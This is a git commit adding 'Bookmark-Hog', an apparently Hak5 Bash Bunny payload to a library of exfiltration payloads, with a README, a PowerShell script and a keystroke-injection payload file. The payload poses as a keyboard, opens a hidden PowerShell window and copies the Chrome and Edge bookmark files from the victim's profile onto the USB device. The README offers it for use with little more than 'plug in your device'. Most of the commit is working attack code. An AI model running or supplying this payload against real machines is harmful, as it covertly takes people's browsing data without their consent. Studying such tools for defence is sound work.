New payload - Bookmark-Hog (#543)

2025-10-29 16:58:25 +00:00 · 2022-08-30 10:56:42 -04:00
parent b10a644277
commit 8e322706bc
3 changed files with 173 additions and 0 deletions
--- a/payloads/library/exfiltration/Bookmark-Hog/BBB.ps1
+++ b/payloads/library/exfiltration/Bookmark-Hog/BBB.ps1
@@ -0,0 +1,47 @@
 #Bookmark-Hog
 # Get Drive Letter
 $bb = (gwmi win32_volume -f 'label=''BashBunny''').Name
 # Test if directory exists if not create directory in loot folder to store file
 $TARGETDIR = "$bb\loot\Bookmark-Hog\$env:computername\Chromebm.txt"
 $TARGETDIR2 = "$bb\loot\Bookmark-Hog\$env:computername\Edgebm.txt"
 if(!(Test-Path -Path $TARGETDIR )){
    mkdir $TARGETDIR
 }
 # See if file is a thing
 Test-Path -Path "$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/Bookmarks" -PathType Leaf
 #If the file does not exist, write to host.
 if (-not(Test-Path -Path "$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/Bookmarks" -PathType Leaf)) {
     try {
         Write-Host "The chrome bookmark file has not been found. "
     }
     catch {
         throw $_.Exception.Message
     }
 }
 # Copy Chrome Bookmarks to Bash Bunny
  else {
     Copy-Item "$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/Bookmarks" -Destination "$TARGETDIR" 
 }
 # See if file is a thing
 Copy-Item "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/Bookmarks" -Destination "$TARGETDIR2" 
 #If the file does not exist, write to host.
 if (-not(Test-Path -Path "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/Bookmarks" -PathType Leaf)) {
    try {
        Write-Host "The edge bookmark file has not been found. "
    }
    catch {
        throw $_.Exception.Message
    }
 }
 # Copy Chrome Bookmarks to Bash Bunny
 else {
    Copy-Item "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/Bookmarks" -Destination "$TARGETDIR2" 
 }
--- a/payloads/library/exfiltration/Bookmark-Hog/README.md
+++ b/payloads/library/exfiltration/Bookmark-Hog/README.md
@@ -0,0 +1,104 @@
 <img src="https://github.com/atomiczsec/My-Payloads/blob/main/Assets/bm-hog.png?" width="200">
 <h1 align="center">
  <a href="https://git.io/typing-svg">
    <img src="https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+the;Bookmark+Hog!+😈&center=true&size=30">
  </a>
 </h1>
 <!-- TABLE OF CONTENTS -->
 <details>
  <summary>Table of Contents</summary>
  <ol>
    <li><a href="#Description">Description</a></li>
    <li><a href="#getting-started">Getting Started</a></li>
    <li><a href="#Contributing">Contributing</a></li>
    <li><a href="#Version-History">Version History</a></li>
    <li><a href="#Contact">Contact</a></li>
    <li><a href="#Acknowledgments">Acknowledgments</a></li>
  </ol>
 </details>
 # Bookmark-Hog
 A payload to exfiltrate bookmarks of the 2 most popular browsers
 ## Description
 This payload will enumerate through the browser directories, looking for the file that stores the bookmark history 
 These files will be saved to the bash bunny in the loot directory
 ## Getting Started
 ### Dependencies
 * Windows 10,11
 <p align="right">(<a href="#top">back to top</a>)</p>
 ### Executing program
 * Plug in your device
 * Let the magic happen
 <p align="right">(<a href="#top">back to top</a>)</p>
 ## Contributing
 All contributors names will be listed here
 atomiczsec
 I am Jakoby
 <p align="right">(<a href="#top">back to top</a>)</p>
 ## Version History
 * 0.1
    * Initial Release
 <p align="right">(<a href="#top">back to top</a>)</p>
 <!-- CONTACT -->
 ## Contact
 <h2 align="center">📱 My Socials 📱</h2>
 <div align=center>
 <table>
  <tr>
    <td align="center" width="96">
      <a href="https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1">
        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width="48" height="48" alt="C#" />
      </a>
      <br>YouTube
    </td>
    <td align="center" width="96">
      <a href="https://twitter.com/atomiczsec">
        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width="48" height="48" alt="Python" />
      </a>
      <br>Twitter
    </td>
    <td align="center" width="96">
      <a href="https://discord.gg/MYYER2ZcJF">
        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width="48" height="48" alt="Jsonnet" />
      </a>
      <br>I-Am-Jakoby's Discord
    </td>
  </tr>
 </table>
 </div>
 <p align="right">(<a href="#top">back to top</a>)</p>
 <p align="right">(<a href="#top">back to top</a>)</p>
 <!-- ACKNOWLEDGMENTS -->
 ## Acknowledgments
 * [Hak5](https://hak5.org/)
 * [I-Am-Jakoby](https://github.com/I-Am-Jakoby)
 <p align="right">(<a href="#top">back to top</a>)</p>
--- a/payloads/library/exfiltration/Bookmark-Hog/payload.txt
+++ b/payloads/library/exfiltration/Bookmark-Hog/payload.txt
@@ -0,0 +1,22 @@
 # Title:         Bookmark-Hog
 # Description:   This payload is meant to exfiltrate bookmarks to the bash bunny.
 # Author:        atomiczsec
 # Version:       1.0
 # Category:      Exfiltration
 # Attackmodes:   HID, Storage
 # Target:        Windows 10, 11
 LED SETUP
 GET SWITCH_POSITION
 ATTACKMODE HID STORAGE
 LED STAGE1
 QUACK DELAY 3000
 QUACK GUI r
 QUACK DELAY 100
 LED STAGE2
 QUACK STRING powershell -NoP -NonI -W Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\BBB.ps1')"
 QUACK ENTER